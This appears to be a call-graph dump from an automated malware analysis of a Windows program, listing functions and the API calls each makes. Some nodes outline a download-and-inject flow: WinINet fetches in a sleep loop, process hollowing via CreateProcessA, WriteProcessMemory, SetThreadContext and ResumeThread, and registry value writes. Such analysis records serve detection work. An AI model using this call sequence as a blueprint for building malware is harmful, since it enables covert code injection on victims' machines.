1185760 27 API calls 21241->21244 21245 1185760 27 API calls 21242->21245 21247 11817fd 21243->21247 21248 1181902 21244->21248 21246 11815a2 21245->21246 21249 1185760 27 API calls 21246->21249 21250 1185760 27 API calls 21247->21250 21251 1185760 27 API calls 21248->21251 21252 11815bd 21249->21252 21253 1181818 21250->21253 21254 118191d 21251->21254 21255 1185760 27 API calls 21252->21255 21256 1185760 27 API calls 21253->21256 21257 1185760 27 API calls 21254->21257 21258 11815d8 21255->21258 21259 1181833 21256->21259 21260 1181938 21257->21260 21261 1185760 27 API calls 21258->21261 21262 1185760 27 API calls 21259->21262 21263 1185760 27 API calls 21260->21263 21264 11815f3 21261->21264 21265 118184b 21262->21265 21266 1181953 21263->21266 21268 1185760 27 API calls 21264->21268 21269 1185760 27 API calls 21265->21269 21267 1185760 27 API calls 21266->21267 21270 118160b 21267->21270 21268->21270 21271 118185d 21269->21271 21273 1185760 27 API calls 21270->21273 21384 117f5e0 76 API calls 3 library calls 21271->21384 21274 118161d 21273->21274 21291 117e580 21274->21291 21277 1185760 27 API calls 21276->21277 21278 1176d4e 21277->21278 21279 1172be0 42 API calls 21278->21279 21280 1176d57 21279->21280 21281 1176dfc 21280->21281 21283 1176e1d 21280->21283 21282 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21281->21282 21284 1176e19 21282->21284 21285 118b98e 25 API calls 21283->21285 21284->21187 21284->21190 21286 1176e22 21285->21286 21288 118b785 21287->21288 21390 118b501 21288->21390 21292 118b4a2 _free 14 API calls 21291->21292 21293 117e5d9 21292->21293 21294 118b76a 40 API calls 21293->21294 21295 117e5fb 21294->21295 21296 117ef05 21295->21296 21297 117e60a 21295->21297 21464 1186c62 27 API calls 2 library calls 21296->21464 21298 117ef1e 21297->21298 21302 1185760 27 API calls 21297->21302 21466 1186ca2 27 API calls 2 library calls 21298->21466 21300 117ef0f 21303 118b98e 25 API calls 21300->21303 21304 117e847 21302->21304 21305 117ef14 21303->21305 21306 1185760 27 API calls 21304->21306 21465 1186c62 27 API calls 2 library calls 21305->21465 21308 117e859 21306->21308 21420 118a81c 21308->21420 21311 117eb7c 21313 1185760 27 API calls 21311->21313 21315 117eb96 21313->21315 21314 117e892 21316 1185760 27 API calls 21314->21316 21317 1172be0 42 API calls 21315->21317 21321 117e8a7 21316->21321 21318 117eb9d 21317->21318 21319 1185760 27 API calls 21318->21319 21320 117ebb3 21319->21320 21322 1185760 27 API calls 21320->21322 21321->21300 21323 118b4a2 _free 14 API calls 21321->21323 21324 117ebcb 21322->21324 21325 117e931 21323->21325 21326 1185760 27 API calls 21324->21326 21328 118b76a 40 API calls 21325->21328 21327 117eb76 21326->21327 21330 1185760 27 API calls 21327->21330 21329 117e95c 21328->21329 21329->21298 21329->21305 21329->21311 21331 117e97c 21329->21331 21344 117eb0c 21330->21344 21332 1185ac0 27 API calls 21331->21332 21333 117e9a4 21332->21333 21334 1185760 27 API calls 21333->21334 21335 117e9bf 21334->21335 21336 1185760 27 API calls 21335->21336 21337 117e9d4 21336->21337 21436 1173c70 21337->21436 21339 117e9dd 21340 117eb14 21339->21340 21341 117e9ed 21339->21341 21342 1185760 27 API calls 21340->21342 21343 1185760 27 API calls 21341->21343 21345 117eb29 21342->21345 21346 117ea02 21343->21346 21344->21300 21347 117eedf 21344->21347 21348 1172be0 42 API calls 21345->21348 21349 1172be0 42 API calls 21346->21349 21350 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21347->21350 21351 117eb30 21348->21351 21352 117ea09 21349->21352 21355 117ef01 21350->21355 21353 1185760 27 API calls 21351->21353 21354 1185760 27 API calls 21352->21354 21356 117eb46 21353->21356 21357 117ea1f 21354->21357 21355->21190 21358 1185760 27 API calls 21356->21358 21359 1185760 27 API calls 21357->21359 21360 117eb5e 21358->21360 21361 117ea37 21359->21361 21362 1185760 27 API calls 21360->21362 21363 1185760 27 API calls 21361->21363 21362->21327 21364 117ea4f 21363->21364 21365 1185760 27 API calls 21364->21365 21366 117ea61 21365->21366 21366->21344 21367 1185760 27 API calls 21366->21367 21368 117eabd 21367->21368 21369 1185760 27 API calls 21368->21369 21370 117eadd 21369->21370 21371 11751e0 42 API calls 21370->21371 21372 117eae4 21371->21372 21373 1185760 27 API calls 21372->21373 21374 117eaf9 21373->21374 21375 1172be0 42 API calls 21374->21375 21376 117eb00 21375->21376 21454 1172ea0 RegOpenKeyExA 21376->21454 21378->21216 21380 11856d1 21379->21380 21381 11856ae 21379->21381 21380->21230 21381->21380 21382 118b98e 25 API calls 21381->21382 21383 118571c 21382->21383 21384->21190 21408 118b74f 21390->21408 21392 118b54c 21395 118a9fd __fassign 37 API calls 21392->21395 21393 118b528 21396 118b4a2 _free 14 API calls 21393->21396 21394 118b513 21394->21392 21394->21393 21407 11814e9 21394->21407 21400 118b558 21395->21400 21397 118b52d 21396->21397 21415 118b97e 25 API calls __wsopen_s 21397->21415 21402 118b587 21400->21402 21416 118abfc 40 API calls 2 library calls 21400->21416 21401 118b5f1 21418 118b726 25 API calls 2 library calls 21401->21418 21402->21401 21417 118b726 25 API calls 2 library calls 21402->21417 21405 118b6b9 21406 118b4a2 _free 14 API calls 21405->21406 21405->21407 21406->21407 21407->21172 21407->21207 21409 118b754 21408->21409 21410 118b767 21408->21410 21411 118b4a2 _free 14 API calls 21409->21411 21410->21394 21412 118b759 21411->21412 21419 118b97e 25 API calls __wsopen_s 21412->21419 21414 118b764 21414->21394 21415->21407 21416->21400 21417->21401 21418->21405 21419->21414 21467 118a765 21420->21467 21423 118a8aa 21424 118a8b6 __FrameHandler3::FrameUnwindToState 21423->21424 21425 118a8c0 21424->21425 21426 118a8d5 21424->21426 21427 118b4a2 _free 14 API calls 21425->21427 21428 118a8d0 21426->21428 21517 118cda7 EnterCriticalSection 21426->21517 21429 118a8c5 21427->21429 21428->21314 21516 118b97e 25 API calls __wsopen_s 21429->21516 21432 118a8f2 21518 118a833 65 API calls 3 library calls 21432->21518 21434 118a8fd 21519 118a924 LeaveCriticalSection ___scrt_uninitialize_crt 21434->21519 21437 1173cb6 21436->21437 21438 1173d31 21436->21438 21520 1186de2 6 API calls 21437->21520 21439 1185ac0 27 API calls 21438->21439 21442 1173d4d 21439->21442 21441 1173cc0 21441->21438 21521 1187320 28 API calls 21441->21521 21443 1185ac0 27 API calls 21442->21443 21445 1173d66 21443->21445 21447 1185ac0 27 API calls 21445->21447 21446 1173d27 21522 1186d98 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 21446->21522 21449 1173d7f CreateThread Sleep 21447->21449 21451 1173db0 21449->21451 21523 1173b10 21449->21523 21450 1173e56 21450->21339 21451->21450 21452 118b98e 25 API calls 21451->21452 21453 1173e77 21452->21453 21455 1172f07 RegCloseKey 21454->21455 21456 1172edd RegSetValueExA 21454->21456 21457 1172f18 21455->21457 21456->21455 21458 1172fd6 21457->21458 21463 1172fbe 21457->21463 21460 118b98e 25 API calls 21458->21460 21459 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21461 1172fd2 21459->21461 21462 1172fdb 21460->21462 21461->21344 21463->21459 21470 118a771 __FrameHandler3::FrameUnwindToState 21467->21470 21468 118a778 21469 118b4a2 _free 14 API calls 21468->21469 21472 118a77d 21469->21472 21470->21468 21471 118a798 21470->21471 21473 118a7aa 21471->21473 21474 118a79d 21471->21474 21492 118b97e 25 API calls __wsopen_s 21472->21492 21484 118cdcf 21473->21484 21476 118b4a2 _free 14 API calls 21474->21476 21479 117e881 21476->21479 21479->21311 21479->21423 21480 118a7ba 21482 118b4a2 _free 14 API calls 21480->21482 21481 118a7c7 21493 118a805 LeaveCriticalSection ___scrt_uninitialize_crt 21481->21493 21482->21479 21485 118cddb __FrameHandler3::FrameUnwindToState 21484->21485 21494 118cc03 EnterCriticalSection 21485->21494 21487 118cde9 21495 118ce73 21487->21495 21492->21479 21493->21479 21494->21487 21502 118ce96 21495->21502 21496 118ceee 21497 118f5d6 _unexpected 14 API calls 21496->21497 21498 118cef7 21497->21498 21500 118d301 _free 14 API calls 21498->21500 21501 118cf00 21500->21501 21507 118cdf6 21501->21507 21513 118e1b4 6 API calls _unexpected 21501->21513 21502->21496 21502->21502 21502->21507 21511 118cda7 EnterCriticalSection 21502->21511 21512 118cdbb LeaveCriticalSection 21502->21512 21504 118cf1f 21514 118cda7 EnterCriticalSection 21504->21514 21508 118ce2f 21507->21508 21515 118cc4b LeaveCriticalSection 21508->21515 21510 118a7b3 21510->21480 21510->21481 21511->21502 21512->21502 21513->21504 21514->21507 21515->21510 21516->21428 21517->21432 21518->21434 21519->21428 21520->21441 21521->21446 21522->21438 21524 1185760 27 API calls 21523->21524 21525 1173b45 21524->21525 21526 1185760 27 API calls 21525->21526 21527 1173b58 21526->21527 21528 1185760 27 API calls 21527->21528 21529 1173b68 21528->21529 21530 1185760 27 API calls 21529->21530 21531 1173b7d 21530->21531 21532 1185760 27 API calls 21531->21532 21533 1173b92 21532->21533 21534 1185760 27 API calls 21533->21534 21535 1173ba4 21534->21535 21536 1173990 28 API calls 21535->21536 21541 1173bad 21536->21541 21537 1173c67 21540 118b98e 25 API calls 21537->21540 21538 1173c3f 21539 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21538->21539 21542 1173c61 21539->21542 21543 1173c6c 21540->21543 21541->21537 21541->21538 21544 1186cd3 21555 1186cfa InitializeCriticalSectionAndSpinCount GetModuleHandleW 21544->21555 21546 1186cd8 21566 1187193 4 API calls 2 library calls 21546->21566 21548 1186cdf 21549 1186cf2 21548->21549 21550 1186ce4 21548->21550 21568 11875c0 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 21549->21568 21567 1187320 28 API calls 21550->21567 21553 1186cee 21554 1186cf9 21556 1186d1d GetModuleHandleW 21555->21556 21557 1186d2e GetProcAddress GetProcAddress 21555->21557 21556->21557 21558 1186d74 21556->21558 21559 1186d4c 21557->21559 21560 1186d5e CreateEventW 21557->21560 21569 11875c0 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 21558->21569 21559->21560 21561 1186d50 21559->21561 21560->21558 21560->21561 21561->21546 21563 1186d7b DeleteCriticalSection 21564 1186d90 CloseHandle 21563->21564 21565 1186d97 21563->21565 21564->21565 21565->21546 21566->21548 21567->21553 21568->21554 21569->21563 21570 1187434 21571 1187440 __FrameHandler3::FrameUnwindToState 21570->21571 21596 118715a 21571->21596 21573 1187447 21574 11875a0 21573->21574 21582 1187471 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 21573->21582 21636 11875c0 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 21574->21636 21576 11875a7 21577 11875ad 21576->21577 21637 118a74f 23 API calls __InternalCxxFrameHandler 21576->21637 21638 118a713 23 API calls __InternalCxxFrameHandler 21577->21638 21580 11875b5 21581 1187490 21582->21581 21585 1187511 21582->21585 21632 118a729 37 API calls 4 library calls 21582->21632 21607 118c17d 21585->21607 21586 1187517 21611 1185530 21586->21611 21588 118752e 21633 11876e2 GetModuleHandleW 21588->21633 21590 1187538 21590->21576 21591 118753c 21590->21591 21592 1187545 21591->21592 21634 118a704 23 API calls __InternalCxxFrameHandler 21591->21634 21635 11872cb 73 API calls ___scrt_uninitialize_crt 21592->21635 21595 118754e 21595->21581 21597 1187163 21596->21597 21639 11877ad IsProcessorFeaturePresent 21597->21639 21599 118716f 21640 118819f 10 API calls 2 library calls 21599->21640 21601 1187174 21606 1187178 21601->21606 21641 118c5e9 21601->21641 21604 118718f 21604->21573 21606->21573 21608 118c18b 21607->21608 21609 118c186 21607->21609 21608->21586 21681 118bee1 21609->21681 21725 1179c70 21611->21725 21613 118553e 21614 1177d90 38 API calls 21613->21614 21615 1185543 21614->21615 21616 1179790 45 API calls 21615->21616 21617 118554d 21616->21617 21618 1179140 44 API calls 21617->21618 21619 1185557 21618->21619 21620 1175cb0 28 API calls 21619->21620 21621 1185561 21620->21621 21622 11829c0 90 API calls 21621->21622 21623 118556e 21622->21623 21624 11854f0 47 API calls 21623->21624 21625 1185573 21624->21625 21626 11855a9 21625->21626 21627 118b98e 25 API calls 21625->21627 21626->21588 21629 11855d0 21627->21629 21628 118560c 21628->21588 21629->21628 21630 118b98e 25 API calls 21629->21630 21631 1185632 21630->21631 21632->21585 21633->21590 21634->21592 21635->21595 21636->21576 21637->21577 21638->21580 21639->21599 21640->21601 21645 1190b7b 21641->21645 21644 11881be 7 API calls 2 library calls 21644->21606 21646 1190b8b 21645->21646 21647 1187181 21645->21647 21646->21647 21649 118f23e 21646->21649 21647->21604 21647->21644 21650 118f24a __FrameHandler3::FrameUnwindToState 21649->21650 21661 118cc03 EnterCriticalSection 21650->21661 21652 118f251 21662 118eab7 21652->21662 21655 118f26f 21677 118f295 LeaveCriticalSection __InternalCxxFrameHandler 21655->21677 21658 118f26a 21676 118f18a GetStdHandle GetFileType 21658->21676 21659 118f280 21659->21646 21661->21652 21663 118eac3 __FrameHandler3::FrameUnwindToState 21662->21663 21664 118eacc 21663->21664 21665 118eaed 21663->21665 21666 118b4a2 _free 14 API calls 21664->21666 21678 118cc03 EnterCriticalSection 21665->21678 21668 118ead1 21666->21668 21679 118b97e 25 API calls __wsopen_s 21668->21679 21670 118eaf9 21672 118ea07 __wsopen_s 15 API calls 21670->21672 21674 118eb25 21670->21674 21672->21670 21673 118eadb 21673->21655 21675 118f0d4 28 API calls 21673->21675 21680 118eb4c LeaveCriticalSection __InternalCxxFrameHandler 21674->21680 21675->21658 21676->21655 21677->21659 21678->21670 21679->21673 21680->21673 21682 118beea 21681->21682 21685 118bf00 21681->21685 21682->21685 21687 118bf0d 21682->21687 21684 118bef7 21684->21685 21700 118c05f 15 API calls 3 library calls 21684->21700 21685->21608 21688 118bf19 21687->21688 21689 118bf16 21687->21689 21701 1190366 21688->21701 21689->21684 21694 118bf2b 21696 118d301 _free 14 API calls 21694->21696 21698 118bf5a 21696->21698 21697 118bf36 21699 118d301 _free 14 API calls 21697->21699 21698->21684 21699->21694 21700->21685 21702 118bf20 21701->21702 21703 119036f 21701->21703 21707 1190707 GetEnvironmentStringsW 21702->21707 21720 118dcaf 37 API calls 3 library calls 21703->21720 21705 1190392 21721 11901ad 47 API calls 3 library calls 21705->21721 21708 119071e 21707->21708 21718 1190774 21707->21718 21722 1190623 WideCharToMultiByte 21708->21722 21709 119077d FreeEnvironmentStringsW 21710 118bf25 21709->21710 21710->21694 21719 118bf60 25 API calls 4 library calls 21710->21719 21712 1190737 21712->21718 21723 118d7ea 15 API calls 2 library calls 21712->21723 21714 1190747 21715 119075f 21714->21715 21724 1190623 WideCharToMultiByte 21714->21724 21717 118d301 _free 14 API calls 21715->21717 21717->21718 21718->21709 21718->21710 21719->21697 21720->21705 21721->21702 21722->21712 21723->21714 21724->21715 21726 1185760 27 API calls 21725->21726 21727 1179cab 21726->21727 21728 1172be0 42 API calls 21727->21728 21729 1179cb6 GetTempPathA 21728->21729 21730 1179cf8 21729->21730 21730->21730 21731 1185ac0 27 API calls 21730->21731 21732 1179d14 21731->21732 21733 1185c10 27 API calls 21732->21733 21734 1179d2a 21733->21734 21735 1185760 27 API calls 21734->21735 21736 1179dee 21735->21736 21737 1172be0 42 API calls 21736->21737 21738 1179df9 21737->21738 21743 1185f90 21738->21743 21740 1179e15 21741 1185c10 27 API calls 21740->21741 21742 1179e2a 21741->21742 21744 1185ff0 21743->21744 21744->21744 21752 1186720 21744->21752 21746 1186009 21748 1186024 __InternalCxxFrameHandler 21746->21748 21764 1186460 27 API calls 2 library calls 21746->21764 21748->21748 21751 1186079 __InternalCxxFrameHandler 21748->21751 21765 1186460 27 API calls 2 library calls 21748->21765 21750 11860c1 21750->21740 21751->21740 21754 118673b 21752->21754 21763 1186824 __wsopen_s 21752->21763 21753 11868b1 21766 1172150 27 API calls 2 library calls 21753->21766 21754->21753 21756 11867aa 21754->21756 21757 11867d1 21754->21757 21762 11867bb __wsopen_s 21754->21762 21754->21763 21756->21753 21760 11870b4 27 API calls 21756->21760 21759 11870b4 27 API calls 21757->21759 21757->21762 21758 11868bb 21759->21762 21760->21762 21761 118b98e 25 API calls 21761->21753 21762->21761 21762->21763 21763->21746 21764->21748 21765->21750 21766->21758 21767 1181974 21768 1185760 27 API calls 21767->21768 21769 118198b 21768->21769 21770 1185760 27 API calls 21769->21770 21771 11819a6 21770->21771 21772 1185760 27 API calls 21771->21772 21773 11819be 21772->21773 21774 1185760 27 API calls 21773->21774 21775 11819d0 21774->21775 21778 1180ca0 21775->21778 21786 1180ce0 ___scrt_fastfail 21778->21786 21779 1185760 27 API calls 21779->21786 21780 1180d0f InternetOpenA InternetOpenUrlA InternetReadFile 21781 1180d5f InternetCloseHandle InternetCloseHandle 21780->21781 21782 1180e14 InternetCloseHandle InternetCloseHandle 21780->21782 21816 1173750 GetModuleFileNameA 21781->21816 21784 1180e53 Sleep 21782->21784 21785 1180e68 21784->21785 21784->21786 21787 1185760 27 API calls 21785->21787 21786->21779 21786->21780 21786->21784 21789 1180db0 21786->21789 21790 1180ffb 21786->21790 21788 1180e7f 21787->21788 21791 1172be0 42 API calls 21788->21791 21792 1185760 27 API calls 21789->21792 21795 118b98e 25 API calls 21790->21795 21793 1180e86 21791->21793 21794 1180dc7 21792->21794 21797 1185760 27 API calls 21793->21797 21798 1172be0 42 API calls 21794->21798 21796 1181000 21795->21796 21799 1180e99 21797->21799 21800 1180dce 21798->21800 21801 1185760 27 API calls 21799->21801 21802 1185760 27 API calls 21800->21802 21803 1180eae 21801->21803 21804 1180de1 21802->21804 21805 1185760 27 API calls 21803->21805 21806 1185760 27 API calls 21804->21806 21808 1180ec3 21805->21808 21807 1180df6 21806->21807 21809 1185760 27 API calls 21807->21809 21810 1180e0b 21808->21810 21809->21810 21811 1185760 27 API calls 21810->21811 21812 1180ed5 21811->21812 21812->21790 21813 1180fd5 21812->21813 21814 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21813->21814 21815 1180ff7 21814->21815 21817 117396d VirtualFree 21816->21817 21819 117378a ___scrt_fastfail 21816->21819 21818 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21817->21818 21820 1173988 21818->21820 21819->21817 21821 11737ab CreateProcessA 21819->21821 21820->21786 21821->21817 21822 11737e9 VirtualAlloc GetThreadContext 21821->21822 21822->21817 21823 117381d ReadProcessMemory 21822->21823 21824 1173844 GetModuleHandleA GetProcAddress 21823->21824 21825 117386c VirtualAllocEx 21823->21825 21829 1173869 21824->21829 21825->21817 21826 1173891 WriteProcessMemory 21825->21826 21827 1173906 WriteProcessMemory SetThreadContext ResumeThread VirtualFree 21826->21827 21828 11738b6 21826->21828 21831 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21827->21831 21830 11738b8 WriteProcessMemory 21828->21830 21829->21825 21830->21830 21832 1173900 21830->21832 21833 1173969 21831->21833 21832->21827 21833->21786 21834 117897b 21835 1178996 21834->21835 21836 11789bc 21834->21836 21835->21836 21838 1178a8f 21835->21838 21837 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21836->21837 21839 1178a7c 21837->21839 21840 118b98e 25 API calls 21838->21840 21841 1178a94 21840->21841 21842 1185760 27 API calls 21841->21842 21843 1178fe2 21841->21843 21844 1178afc 21842->21844 21845 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21843->21845 21846 1172be0 42 API calls 21844->21846 21847 1179115 21845->21847 21848 1178b04 21846->21848 21849 1185ac0 27 API calls 21848->21849 21850 1178b47 21849->21850 21851 1178bc1 21850->21851 21852 1185760 27 API calls 21850->21852 21857 1185760 27 API calls 21851->21857 21869 1178d30 21851->21869 21853 1178b76 21852->21853 21854 1172be0 42 API calls 21853->21854 21855 1178b7e 21854->21855 21856 1185ac0 27 API calls 21855->21856 21856->21851 21859 1178d0b 21857->21859 21858 1185760 27 API calls 21860 1178dbd 21858->21860 21861 1172be0 42 API calls 21859->21861 21862 1172be0 42 API calls 21860->21862 21863 1178d13 21861->21863 21864 1178dc5 21862->21864 21865 1185d10 27 API calls 21863->21865 21866 1185ac0 27 API calls 21864->21866 21867 1178d24 21865->21867 21870 1178dfd 21866->21870 21868 11856a0 25 API calls 21867->21868 21868->21869 21869->21858 21873 1185ac0 27 API calls 21870->21873 21883 1178ef7 21870->21883 21871 118a81c 28 API calls 21872 1178fd5 21871->21872 21875 118a8aa 67 API calls 21872->21875 21874 1178ebb 21873->21874 21876 1185760 27 API calls 21874->21876 21875->21843 21877 1178ed2 21876->21877 21878 1172be0 42 API calls 21877->21878 21879 1178eda 21878->21879 21880 1185c10 27 API calls 21879->21880 21881 1178eeb 21880->21881 21882 11856a0 25 API calls 21881->21882 21882->21883 21883->21871 21884 1180395 GetFileAttributesA 21888 11803a5 21884->21888 21885 1180484 21890 1185ac0 27 API calls 21885->21890 21905 1180517 21885->21905 21886 1180c73 21887 118b98e 25 API calls 21886->21887 21922 1180c91 ___scrt_fastfail 21887->21922 21888->21885 21888->21886 21889 1185760 27 API calls 21891 11805f8 21889->21891 21892 11804d4 21890->21892 21893 1172be0 42 API calls 21891->21893 21991 1175830 SHGetFolderPathA 21892->21991 21895 1180603 21893->21895 21898 1185760 27 API calls 21895->21898 21896 1185760 27 API calls 21896->21922 21900 118061e 21898->21900 21899 1185c10 27 API calls 21901 11804f8 CreateDirectoryA 21899->21901 22006 1175030 21900->22006 21901->21905 21904 1180629 21906 1185760 27 API calls 21904->21906 21905->21889 21908 1180640 21906->21908 21907 1180d0f InternetOpenA InternetOpenUrlA InternetReadFile 21909 1180d5f InternetCloseHandle InternetCloseHandle 21907->21909 21910 1180e14 InternetCloseHandle InternetCloseHandle 21907->21910 21913 1172be0 42 API calls 21908->21913 21911 1173750 20 API calls 21909->21911 21912 1180e53 Sleep 21910->21912 21911->21922 21914 1180e68 21912->21914 21912->21922 21915 118064b 21913->21915 21916 1185760 27 API calls 21914->21916 21917 1185ac0 27 API calls 21915->21917 21918 1180e7f 21916->21918 21920 1180691 21917->21920 21923 1172be0 42 API calls 21918->21923 21919 1180db0 21924 1185760 27 API calls 21919->21924 21925 1175830 43 API calls 21920->21925 21921 1180ffb 21929 118b98e 25 API calls 21921->21929 21922->21896 21922->21907 21922->21912 21922->21919 21922->21921 21927 1180e86 21923->21927 21928 1180dc7 21924->21928 21926 11806a0 21925->21926 21931 1185c10 27 API calls 21926->21931 21932 1185760 27 API calls 21927->21932 21933 1172be0 42 API calls 21928->21933 21930 1181000 21929->21930 21934 11806b5 21931->21934 21935 1180e99 21932->21935 21936 1180dce 21933->21936 21937 1185c10 27 API calls 21934->21937 21938 1185760 27 API calls 21935->21938 21939 1185760 27 API calls 21936->21939 21940 11806c7 21937->21940 21941 1180eae 21938->21941 21942 1180de1 21939->21942 21943 1185c10 27 API calls 21940->21943 21944 1185760 27 API calls 21941->21944 21945 1185760 27 API calls 21942->21945 21947 11806db 21943->21947 21948 1180ec3 21944->21948 21946 1180df6 21945->21946 21949 1185760 27 API calls 21946->21949 22017 1185ef0 21947->22017 21951 1180e0b 21948->21951 21949->21951 21952 1185760 27 API calls 21951->21952 21955 1180ed5 21952->21955 21953 11806ef 21954 1185c10 27 API calls 21953->21954 21961 1180700 21954->21961 21955->21921 21956 1180fd5 21955->21956 21957 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21956->21957 21958 1180ff7 21957->21958 21959 118a81c 28 API calls 21960 1180a22 21959->21960 21962 1180ada 21960->21962 21963 118a8aa 67 API calls 21960->21963 21961->21959 21964 1185760 27 API calls 21962->21964 21965 1180a36 21963->21965 21966 1180aeb 21964->21966 21967 1185760 27 API calls 21965->21967 21968 1185760 27 API calls 21966->21968 21972 1180a48 21967->21972 21969 1180afd 21968->21969 21970 118a81c 28 API calls 21969->21970 21973 1180b1c 21970->21973 21971 1180ab3 21974 1185760 27 API calls 21971->21974 21972->21962 21972->21971 21976 118a8aa 67 API calls 21973->21976 21983 1180bde 21973->21983 21975 1180aca 21974->21975 21978 1172be0 42 API calls 21975->21978 21977 1180b2d 21976->21977 21979 1185760 27 API calls 21977->21979 21981 1180ad1 21978->21981 21987 1180b3f 21979->21987 21980 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21982 1180c6f 21980->21982 21984 1185760 27 API calls 21981->21984 21983->21980 21985 1180bd5 21984->21985 22021 1173e80 21985->22021 21987->21983 21988 1185760 27 API calls 21987->21988 21989 1180bbf 21988->21989 21990 1172be0 42 API calls 21989->21990 21990->21981 21992 1185760 27 API calls 21991->21992 21993 117588f 21992->21993 21994 1172be0 42 API calls 21993->21994 21995 117589a 21994->21995 21996 1185ac0 27 API calls 21995->21996 21997 11758ec 21996->21997 21998 1185c10 27 API calls 21997->21998 22001 11758fe 21998->22001 21999 117597e 22002 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21999->22002 22000 11759a5 22004 118b98e 25 API calls 22000->22004 22001->21999 22001->22000 22003 11759a1 22002->22003 22003->21899 22005 11759aa 22004->22005 22007 1175133 22006->22007 22016 1175079 22006->22016 22008 1185ac0 27 API calls 22007->22008 22011 1175183 22008->22011 22009 11751cc 22045 1185c00 27 API calls 22009->22045 22014 11751a9 22011->22014 22015 118b98e 25 API calls 22011->22015 22012 1185ac0 27 API calls 22012->22016 22014->21904 22015->22009 22016->22007 22016->22009 22016->22011 22016->22012 22018 1185f06 22017->22018 22018->22018 22020 1185f1b __InternalCxxFrameHandler 22018->22020 22046 1186460 27 API calls 2 library calls 22018->22046 22020->21953 22022 1185f90 27 API calls 22021->22022 22023 1173ec1 22022->22023 22024 1185d10 27 API calls 22023->22024 22026 1173ed3 22024->22026 22025 1173f04 22027 1185760 27 API calls 22025->22027 22026->22025 22028 1174047 22026->22028 22029 1173f31 22027->22029 22030 118b98e 25 API calls 22028->22030 22031 1185760 27 API calls 22029->22031 22032 117404c 22030->22032 22033 1173f4c 22031->22033 22035 118b98e 25 API calls 22032->22035 22034 1172be0 42 API calls 22033->22034 22036 1173f53 22034->22036 22037 1174051 22035->22037 22038 1185ac0 27 API calls 22036->22038 22039 1173f76 22038->22039 22040 1173990 28 API calls 22039->22040 22043 1173f7f 22040->22043 22041 1174020 22042 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22041->22042 22044 1174043 22042->22044 22043->22032 22043->22041 22044->21983 22046->22020 22047 118eeb7 22048 118f05a 22047->22048 22050 118eee1 22047->22050 22049 118b4a2 _free 14 API calls 22048->22049 22066 118f045 22049->22066 22050->22048 22053 118ef2c 22050->22053 22051 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22052 118f077 22051->22052 22068 1193d3c 22053->22068 22057 118ef60 22058 118f079 22057->22058 22083 1193576 22057->22083 22060 118b9ab __wsopen_s 11 API calls 22058->22060 22062 118f085 22060->22062 22061 118ef72 22061->22058 22090 11935a2 22061->22090 22064 118ef84 22064->22058 22065 118ef8d 22064->22065 22065->22066 22097 1193d99 25 API calls 2 library calls 22065->22097 22066->22051 22069 1193d48 __FrameHandler3::FrameUnwindToState 22068->22069 22070 118ef4c 22069->22070 22098 118cc03 EnterCriticalSection 22069->22098 22076 119354a 22070->22076 22072 1193d59 22073 1193d6d 22072->22073 22099 1193c5e 22072->22099 22117 1193d90 LeaveCriticalSection __InternalCxxFrameHandler 22073->22117 22077 119356b 22076->22077 22078 1193556 22076->22078 22077->22057 22079 118b4a2 _free 14 API calls 22078->22079 22080 119355b 22079->22080 22233 118b97e 25 API calls __wsopen_s 22080->22233 22082 1193566 22082->22057 22084 1193582 22083->22084 22085 1193597 22083->22085 22086 118b4a2 _free 14 API calls 22084->22086 22085->22061 22087 1193587 22086->22087 22234 118b97e 25 API calls __wsopen_s 22087->22234 22089 1193592 22089->22061 22091 11935ae 22090->22091 22092 11935c3 22090->22092 22093 118b4a2 _free 14 API calls 22091->22093 22092->22064 22094 11935b3 22093->22094 22235 118b97e 25 API calls __wsopen_s 22094->22235 22096 11935be 22096->22064 22097->22066 22098->22072 22101 1193caa 22099->22101 22100 1193cb1 22102 1193d21 22100->22102 22105 1193d18 22100->22105 22101->22100 22217 118d7ea 15 API calls 2 library calls 22101->22217 22109 1193d1e 22102->22109 22180 1193b03 22102->22180 22118 1193928 22105->22118 22106 1193cd0 22111 118d301 _free 14 API calls 22106->22111 22108 118d301 _free 14 API calls 22110 1193d2c 22108->22110 22109->22108 22113 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22110->22113 22111->22100 22112 1193cc9 22112->22106 22114 1193cf6 22112->22114 22115 1193d3a 22113->22115 22116 118d301 _free 14 API calls 22114->22116 22115->22073 22116->22100 22117->22070 22119 1193937 22118->22119 22120 11935a2 25 API calls 22119->22120 22121 119394d 22120->22121 22122 1193ad2 22121->22122 22124 119354a 25 API calls 22121->22124 22123 118b9ab __wsopen_s 11 API calls 22122->22123 22178 1193ad9 22122->22178 22126 1193b02 22123->22126 22125 119395f 22124->22125 22125->22122 22127 118d301 _free 14 API calls 22125->22127 22125->22178 22128 11935a2 25 API calls 22126->22128 22129 11939af 22127->22129 22130 1193b28 22128->22130 22218 118d7ea 15 API calls 2 library calls 22129->22218 22131 1193c53 22130->22131 22133 119354a 25 